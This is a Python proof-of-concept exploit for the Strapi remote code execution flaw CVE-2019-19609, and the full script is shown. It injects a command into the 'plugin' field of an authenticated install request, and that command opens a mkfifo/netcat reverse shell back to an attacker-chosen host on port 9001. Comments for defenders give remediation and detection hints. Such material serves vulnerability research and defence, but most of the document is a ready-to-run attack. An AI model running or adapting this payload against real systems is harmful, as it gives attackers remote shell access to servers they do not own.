#!/bin/python
# Proof-of-concept for CVE-2019-19609: shell syntax placed in the "plugin"
# field of a POST to Strapi's admin/plugins/install endpoint.
# Product: Strapi Framework
# Version Affected: strapi-3.0.0-beta.17.7 and earlier
# Fix PR: https://github.com/strapi/strapi/pull/4636
# NPM Advisory: https://www.npmjs.com/advisories/1424
# More information: https://bittherapy.net/post/strapi-framework-remote-code-execution/
#
# Notes for defenders:
#   * The request is authenticated: it carries a bearer JWT taken from argv[3].
#     The script does not obtain a token itself.
#   * Remediation is to run a Strapi release that contains the fix PR above.
#   * Detection: look for POSTs to admin/plugins/install whose "plugin" value
#     contains characters that are not valid in a package name (&&, $(), ;, |).
#     On the host, this payload creates the FIFO /tmp/f and starts /bin/sh and
#     nc with an outbound connection to port 9001. These would presumably be
#     children of the Strapi server process (confirm against the advisory).
import requests
import sys
print("\n\n\nStrapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609")
print("please set up a listener on port 9001 before running the script. you will get a shell to that listener\n")
# Exactly four arguments are required; anything else prints the usage line.
if len(sys.argv) ==5:
    rhost = sys.argv[1]  # used only as the Host header value
    lhost = sys.argv[2]  # interpolated into the payload as the callback address
    jwt = sys.argv[3]    # bearer token sent in the Authorization header
    # The endpoint path is concatenated directly onto argv[4]; no separator is added.
    url = sys.argv[4]+'admin/plugins/install'
    headers = {
        'Host': rhost,
        'Authorization': 'Bearer '+jwt,
        'Content-Type': 'application/json',
        # Fixed string literal, not computed from `data` in this script.
        'Content-Length': '131',
        'Connection': 'close',
    }
    # The JSON body is built by string concatenation. The "plugin" value is the
    # plugin name "documentation" followed by shell syntax; presumably the
    # vulnerable install handler interpolates this value into a shell command
    # (see the linked advisory). `lhost` is inserted unescaped.
    data = '{ "plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc '+lhost+' 9001 >/tmp/f)", "port":"80" }'
    # verify=False turns off TLS certificate validation for this request.
    # `response` is assigned but never inspected, so the script reports
    # neither success nor failure.
    response = requests.post(url, headers=headers, data=data, verify=False)
else:
    print('python3 exploit.py <rhost> <lhost> <jwt> <url>')